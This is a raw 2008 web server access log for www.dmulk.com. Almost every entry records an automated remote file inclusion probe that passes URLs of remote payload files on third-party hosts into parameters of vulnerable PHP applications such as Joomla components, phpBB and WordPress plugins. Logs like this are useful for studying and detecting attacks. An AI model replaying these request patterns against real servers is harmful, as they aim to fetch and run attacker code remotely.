219.117.239.114 - - [24/Aug/2008:09:04:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 62004 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:04:10 -0700] "GET /logs/access_080216.log//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:04:10 -0700] "GET //?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9893 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:04:10 -0700] "GET //?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9893 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:04:10 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 62004 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:04:27 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:04:28 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
204.10.37.130 - - [24/Aug/2008:09:04:47 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:04:47 -0700] "GET /logs/access_080216.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:04:48 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 62004 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:04:48 -0700] "GET //?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 9917 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:04:53 -0700] "GET /logs/access_080625.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:04:54 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:04:55 -0700] "GET /logs/access_080216.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:04:55 -0700] "GET /logs//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 200 62004 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:04:56 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 62004 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:04:56 -0700] "GET //?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 200 9896 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:04:56 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:04:57 -0700] "GET /logs/access_080216.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:04:58 -0700] "GET //?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 200 9917 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:05:01 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:05:01 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:05:02 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:05:04 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:05:05 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.85.215.9 - - [24/Aug/2008:09:05:15 -0700] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.85.215.9 - - [24/Aug/2008:09:05:15 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.85.215.9 - - [24/Aug/2008:09:05:16 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:05:30 -0700] "GET /logs/access_080625.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:05:36 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:05:47 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:05:48 -0700] "GET /logs/access_080625.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:05:48 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:05:48 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:05:58 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:06:07 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.64.153.207 - - [24/Aug/2008:09:06:08 -0700] "GET /logs/access_071119.log HTTP/1.0" 200 21994 "http://www.metacrawler.com/info.metac/search/web/explaination" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:10 -0700] "GET /logs/access_080625.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:10 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:11 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:12 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:13 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:06:25 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:06:26 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.29.68.128 - - [24/Aug/2008:09:06:31 -0700] "GET /logs/index.php?incl=http://gameurs.free.fr/pod/skins/advanced/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:06:31 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.68.128 - - [24/Aug/2008:09:06:32 -0700] "GET /index.php?incl=http://gameurs.free.fr/pod/skins/advanced/sistem.gif? HTTP/1.1" 200 9888 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:33 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:33 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:06:35 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:06:47 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:06:48 -0700] "GET /logs/access_080810.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:49 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:06:49 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:06:54 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:06:54 -0700] "GET /logs/access_080404.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.202.88.42 - - [24/Aug/2008:09:06:59 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cemen_dewi/dewi/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.202.88.42 - - [24/Aug/2008:09:07:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cemen_dewi/dewi/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:04 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:04 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:07 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.85.215.9 - - [24/Aug/2008:09:07:12 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:41 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:41 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:44 -0700] "GET /logs/access_080625.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:49 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:52 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:07:52 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:06 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:06 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:12 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:15 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:15 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:15 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:18 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:18 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:08:36 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:08:40 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:42 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:42 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:45 -0700] "GET /logs/access_080326.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:09:08:49 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:09:08:49 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:55 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:56 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:59 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:09:08:59 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:09:08:59 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:08:59 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:09:00 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:09:01 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:09:25 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:09:25 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:09:58 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:09:09:58 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:09:58 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:09:09:59 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:10:11 -0700] "GET /logs/access_080327.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:10:24 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:10:24 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:10:25 -0700] "GET /logs/access_080109.log//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:10:39 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:10:39 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
